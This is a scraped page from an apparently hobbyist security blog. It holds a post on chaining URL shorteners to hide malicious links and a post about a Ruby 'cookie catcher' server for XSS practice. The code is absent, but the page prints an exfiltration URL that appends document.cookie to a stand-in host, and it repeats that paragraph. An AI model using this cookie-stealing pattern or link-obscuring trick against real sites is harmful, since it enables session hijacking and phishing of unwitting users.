Attackers have been hiding malicious URLs using shortening services like TinyURL or bit.ly for some time now. Some smarter folks, however, have plugins that automatically resolve shortened URL's for them.
For a little extra umph, what if the attacker shortened an already shortened URL? I wonder how many of these tools are prepared to unravel a chain of shortened URLs.
I haven't seen this technique yet, so hopefully I'm the inventor and everyone will call it "Russian Dolling."
p.s. On an only slightly related note, does anyone know of any services that let you edit the target URL afterwards? If so, you could create a loop in shortened URLs. That would be awesome.
UPDATE:
Diogo Mónica notified me that he has seen such attacks in the wild, and there are tools that can handle it. While not surprising in the least, I must admit I am still a little disappointed it won't be named Russian Dolling. Alas.
Diogo also pointed out that loops are possible using services such as ow.ly. Such as this one http://ow.ly/3VcCy. Don't use bit.ly though, because it will warn you of encapsulation. Be sure to check out Diogo's blog if you get the chance, it's awesome.
Showing posts with label xss. Show all posts
Showing posts with label xss. Show all posts
Friday, February 11, 2011
Sunday, November 14, 2010
Simple Ruby Cookie Catcher
So I've been playing around with some XSS the last couple days on Google Code Univerity's web security tutorial and it's pretty awesome. However, injecting <script>alert("xss!")</script> isn't quite as fun as actually stealing data.
So I did a quick google search for simple cookie catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in ruby. And so, without further ado...
There you go. The XSS script needs to make the browser issue an HTTP GET request to the ruby server; the url can look like anything, just include a '?' followed by a query string containing the desired data (like a cookie). The url I build looks like:
You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.
So I did a quick google search for simple cookie catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in ruby. And so, without further ado...
There you go. The XSS script needs to make the browser issue an HTTP GET request to the ruby server; the url can look like anything, just include a '?' followed by a query string containing the desired data (like a cookie). The url I build looks like:
"http://blahblah.com:8080/hai?"+document.cookie
You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.
Subscribe to:
Posts (Atom)